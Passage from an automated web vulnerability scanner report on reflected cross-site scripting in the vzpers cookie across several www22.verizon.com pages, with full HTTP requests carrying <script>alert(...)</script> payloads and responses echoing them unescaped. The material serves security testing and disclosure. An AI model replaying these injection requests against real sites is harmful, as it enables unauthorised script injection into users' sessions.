Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 1f761<script>alert(1)</script>60851535953 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX1f761<script>alert(1)</script>60851535953; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69841
Expires: Mon, 13 Dec 2010 00:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1F761<SCRIPT>ALERT(1)</SCRIPT>60851535953 </DIV>
...[SNIP]...

1.99. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7743c'><script>alert(1)</script>0e45b930e35 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX7743c'><script>alert(1)</script>0e45b930e35; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69845
Expires: Mon, 13 Dec 2010 00:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7743C'><SCRIPT>ALERT(1)</SCRIPT>0E45B930E35 ' />
...[SNIP]...

1.100. http://www22.verizon.com/Residential/Internet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 71316<script>alert(1)</script>167fc43e545 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX71316<script>alert(1)</script>167fc43e545; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; RVServiceLocation=TX; ContextInfo_State=TX; BTagRequired=N; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm#; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67130
Expires: Mon, 13 Dec 2010 00:46:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:46:55 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:55 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:51:55 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX71316<SCRIPT>ALERT(1)</SCRIPT>167FC43E545 </DIV>
...[SNIP]...

1.101. http://www22.verizon.com/Residential/Internet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb14c'><script>alert(1)</script>e8da0b240f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXbb14c'><script>alert(1)</script>e8da0b240f; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; RVServiceLocation=TX; ContextInfo_State=TX; BTagRequired=N; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm#; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67132
Expires: Mon, 13 Dec 2010 00:46:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:46:53 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:53 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:51:53 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBB14C'><SCRIPT>ALERT(1)</SCRIPT>E8DA0B240F ' />
...[SNIP]...

1.102. http://www22.verizon.com/Residential/Services/BackupAndSharing/BackupAndSharing.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/BackupAndSharing/BackupAndSharing.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b7d7'><script>alert(1)</script>002ff3c6653 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupAndSharing/BackupAndSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3b7d7'><script>alert(1)</script>002ff3c6653; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62101
Expires: Mon, 13 Dec 2010 00:59:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:59 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3B7D7'><SCRIPT>ALERT(1)</SCRIPT>002FF3C6653 ' />
...[SNIP]...

1.103. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95522'><script>alert(1)</script>dadb653689f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX95522'><script>alert(1)</script>dadb653689f; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64400
Expires: Mon, 13 Dec 2010 00:59:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:40 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:40 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:40 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX95522'><SCRIPT>ALERT(1)</SCRIPT>DADB653689F ' />
...[SNIP]...

1.104. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47fdc'><script>alert(1)</script>e7adc9e2e28 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX47fdc'><script>alert(1)</script>e7adc9e2e28; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60473
Expires: Mon, 13 Dec 2010 00:59:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:50 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX47FDC'><SCRIPT>ALERT(1)</SCRIPT>E7ADC9E2E28 ' />
...[SNIP]...

1.105. http://www22.verizon.com/Residential/TV/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 77179<script>alert(1)</script>f489fa66323 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX77179<script>alert(1)</script>f489fa66323; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60548
Expires: Mon, 13 Dec 2010 00:53:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:58 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX77179<SCRIPT>ALERT(1)</SCRIPT>F489FA66323 </DIV>
...[SNIP]...

1.106. http://www22.verizon.com/Residential/TV/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e259'><script>alert(1)</script>887b6957a49 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX4e259'><script>alert(1)</script>887b6957a49; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60552
Expires: Mon, 13 Dec 2010 00:53:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:44 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:44 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4E259'><SCRIPT>ALERT(1)</SCRIPT>887B6957A49 ' />
...[SNIP]...

1.107. http://www22.verizon.com/Residential/WiFi/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fbda'><script>alert(1)</script>7cec462b4ab was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX2fbda'><script>alert(1)</script>7cec462b4ab; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72112
Expires: Mon, 13 Dec 2010 01:00:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2FBDA'><SCRIPT>ALERT(1)</SCRIPT>7CEC462B4AB ' />
...[SNIP]...

1.108. http://www22.verizon.com/Residential/WiFi/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
